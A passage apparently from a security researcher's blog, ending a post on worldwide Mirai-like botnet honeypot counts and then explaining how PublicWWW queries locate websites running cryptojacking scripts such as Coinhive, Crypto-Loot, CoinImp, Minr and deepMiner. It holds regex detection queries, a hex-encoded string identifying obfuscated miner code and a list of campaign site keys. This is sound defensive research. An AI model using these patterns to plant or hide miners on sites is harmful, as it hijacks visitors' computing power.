China dominated the count of unique IPs seen with 27,672. India and Brazil both had over 10,000 unique IPs each. Japan and Argentina were close behind with over 9,000 unique IPs each. Russia and the United States were also among the top 10 countries with 7,801 and 5,045 unique IPs, respectively.

Top 10 Country

Continuing the trend, network providers China Telecom and China Unicom led in total overall volume, combining for a total of 23,243 unique IPs seen. Coming in third place was Telefonica de Argentina with 7,576 unique IPs. Rounding out the top five network providers in unique IPs seen was Rostelecom (Russia) with 5,407 and Tigo Colombia with 3,301.

Top 10 ASN

During the one year of data collection, I saw botnet traffic from 179 of the 195 recognized countries in the world. IP addresses registered to 5,581 unique network providers (ASNs) were also observed. It was clear that Mirai-like botnet activity was truly worldwide phenomenon.

Closing Remarks

The unique IPs seen by my honeypot is only a tiny fraction of those participating in active botnets. In the case with Satori botnet, other security researchers estimate the total size peaked around 650,000 infected devices.

The data provided via the new website will remain free and open to the public. I will continue to update it daily with my latest available data.

Follow me on Twitter to receive my daily Mirai-like botnet statistics update of new unique IPs seen, top ten countries and top five ASNs seen in the Mirai-like botnet.

How to find cryptojacking malware

Cryptojacking malware continues to spread across the web, largely due to the popularity of Coinhive. Since Coinhive’s launch in September 2017, numerous cryptojacking clones have come about.

The tool I’ve chosen to locate them with is PublicWWW. This is a search engine that indexes the entire source code of websites. I previously offered a comparison of their dataset versus other providers in my discussion of Coinhive malware specifically.

In this post, I detail how to find websites containing Coinhive, Crypto-Loot, CoinImp, and deepMiner in PublicWWW.

Let’s jump in and see how many sites with cryptojacking malware we can find!


Before we review some of the knock-offs, let’s look at the most synonymous name with cryptojacking, Coinhive. Finding this malware is relatively easy and various queries can be used to locate it. The original Coinhive JavaScript library used in cryptojacking is “coinhive.min.js” and we can start by simply searching for that. It’s important to search for the entire name in quotes to ensure an exact match is returned by PublicWWW.

PublicWWW search for "coinhive.min.js"

Using this query, we find 34,474 sites. While this may seem like an astounding number,  it’s only a modest increase since I wrote about the 30,000 sites found back in November 2017.

While this list of sites is great for an overview of sites with Coinhive malware, we can dig even deeper into PublicWWW’s dataset to extract the Coinhive site key used on each site. This can be done using regex to extract the site key as a snippet: “coinhive.min.js” snipexp:|CoinHive.Anonymous(‘?(w{32})’|i

PublicWWW search for "coinhive.min.js" snipexp:|CoinHive.Anonymous('?(w{32})'|i

Once the Coinhive site key is extracted, we can export the results and correlate which sites are part of a cryptojacking campaign. This correlation of a small number of Coinhive site keys to hundreds and even thousands of websites was documented in my previous post.

Recently I found a large cryptojacking campaign targeting 5,451 WordPress sites. In each case, the JavaScript containing Coinhive was hidden via obfuscation.

Example site found in WordPress cryptojacking campaign
The obfuscated JavaScript code is illegible and must be deobfuscated first to be human-readable.

While PublicWWW can’t search within the deobfuscated JavaScript itself, we can find a way to work around it.

PublicWWW search for sites found in large WordPress cryptojacking campaign.

To search for the affected sites, the following query, graciously crafted for me by VriesHd,  was used:

“[“(k” “\x43\x72\x79\x70\x74\x6f\x6e\x69\x67\x68\x74\x57\x41\x53\x4d\x57\x72\x61\x70\x70\x65\x72” snipexp:|(var _0x[0-z]{4}=)|

This query searches for the JavaScript function name used for the obfuscated code and then regex to extract a snippet of that name. This is useful to correlate the function name, such as “var _0xb70e” to the Coinhive site key used. Six unique keys were found to be used in this cryptojacking campaign:

Coinhive site key (function name)
DhGEVUgOoquJP68XByYLFs0nRVV4gq4J (0xb70e)
bbgnHTSmMLKUMaQzNa3Yfoul34A3cACd (0xbcba,0xe2f6)
hg9mNsA2DPkqe1F9yCUyWXggnDyrPqVW (0x1b00)
T6Oy0x11TMdeZRjy684Xow4GNBpb07SK (0xf80b)
OQoqVYH65ER2Eg2xcmoVtv4qrcHP2Z7G (0xe4d0,0xb765,0xcc28)
VW8fWIsg9hjn47qBdmb0jImf7pDHmU28 (0x8f35)

In some cases the same Coinhive site key was associated to multiple functions, shown above.


Crypto-Loot has steadily remained as one the most popular alternatives to Coinhive since its inception. Similar to Coinhive, Crypto-Loot doesn’t require any user interaction and can run steathlity in the background.

This is a prominent feature on Crypto-Loot’s marketing page, in addition to DDoS protection which is provided by Cloudflare.

Crypto-Loot is advertised to run secretly in the background while protected from DDoS attacks by Cloudflare.

Crypto-Loot uses two domain names for their cryptojacking operations:

These domains can be queried in PublicWWW to locate the affected sites, and similar to the Coinhive, we can use regex to extract the site key used in each using this query: “CryptoLoot.Anonymous” snipexp:|CryptoLoot.Anonymous(‘?(w{44})’|i

PublicWWW search for  "CryptoLoot.Anonymous" snipexp:|CryptoLoot.Anonymous('?(w{44})'|i

Searching for strictly the two domains used, we find a total of 2,057 sites with Crypto-Loot present.


CoinImp is a relatively new player in the cryptojacking game, however a large increase in the number of sites where it has been seen has been found recently.

CoinImp uses four domain names for their cryptojacking operations:

Interestingly, the reference to “www.hashing.win” previously found in CoinImp’s documentation was quietly removed sometime after 2017-12-20 and replaced with “www.freecontent.bid” as the illustrative example.

Screenshot captured of CoinImp's documentation page on 2017-12-20.
Screenshot captured of CoinImp’s documentation page on 2017-12-20.

Coincidentally, the most used CoinImp domain name, www.hashing.win, has been found by PublicWWW on a whopping 3,745 sites.

PublicWWW search for www.hashing.win

Since this was surprising number, I manually reviewed numerous sites and found that CoinImp had already been removed or another form of cryptojacking malware, such as Coinhive, had been placed. This leads me to believe the cryptojacking campaign perpetrator was using a short-lived method to place the CoinImp code.

Totaling the four CoinImp domain names used, we find a total of 4,119 sites.


Early in December 2017, I discovered a new form of cryptojacking malware called Minr. What differentiated this from the others is that it provided built-in obfuscation for its users. This wasn’t required however and many sites I found didn’t bother to use it.

Example site containing Minr malware
Example of a site containing Minr malware.

In addition, the domain names used by Minr were innocuous looking. The domain names also frequently changed, so anytime I shared an update it quickly became out of date.

Minr malware domains used on 2018-01-29

The domains used by Minr a week ago (shown above) have again have changed.

As of this writing, the active domains used by Minr in cryptojacking operations are:

Totaling the four Minr domain names currently used today, we find a total of 692 sites.


Unlike the other cryptojacking providers, deepMiner is self-hosted JavaScript. This means the code used to mine cryptocurrency is not hosted by a third-party service provider and instead placed directly on the website or domain controlled by the cryptojacking campaign operator. The repository of deepMiner’s source code can be found on GitHub.

While this might appear to be a roadblock in our search for sites containing, deepMiner, there is still a way to locate it. The secret in locating deepMiner lies in locating the function required for it to run, shown in the snippet below:

deepMiner code snippet

Now that we have this information, we can simply search PublicWWW for “deepMiner.Anonymous” to locate the affected websites.

PublicWWW search for "deepMiner.Anonymous"

This leads us to find 2,160 sites using deepMiner for cryptojacking purposes.

One site I found using deepMiner was a fake Chrome update website that advised users not to close the page. Meanwhile cryptojacking was happening in the background consuming 100% CPU of my test machine.

Fake Chrome update website running deepMiner malware
No, Chrome really isn’t updating.

Statistics Comparison

Coinhive remains the market leader for cryptojacking malware. However, many clones it inspired are showing exponential growth rates.

Websites found running Crypto-Loot, CoinImp, deepMiner, and Minr malware.

The four Coinhive clones discussed were found on a total of 9,028 websites. CoinImp had the largest market share at roughly 45% while Minr had the smallest at nearly 8%. Crypto-Loot and deepMiner shared the remaining portions at nearly 23% a piece.

Websites found running Coinhive and other cryptojacking malware.

However when compared to Coinhive by itself, the other cryptojacking malware providers only account for a modest 18% market share. I would expect Coinhive to remain in the top spot for the foreseeable future.

Closing Remarks

Coinhive is clearly the market leader when it comes to cryptojacking malware as it’s been found on nearly 40,000 websites.

For Chrome users, I recommend using a dedicated extension, minerBlock, to block cryptojacking malware. A Firefox version of this extension is available as well.

The cryptojacking malware discussed in this post is only a portion of what’s currently found in the wild. New variants are discovered frequently, which I share frequently on Twitter. You can also browse the CoinBlockerLists, which is constantly updated by ZeroDot1, where you can find hundreds of domains tied to cryptojacking malware.

The statistics shared in this post were generated from data provided by PublicWWW on 2018-02-07. They are subject to change as PublicWWW regularly updates their index.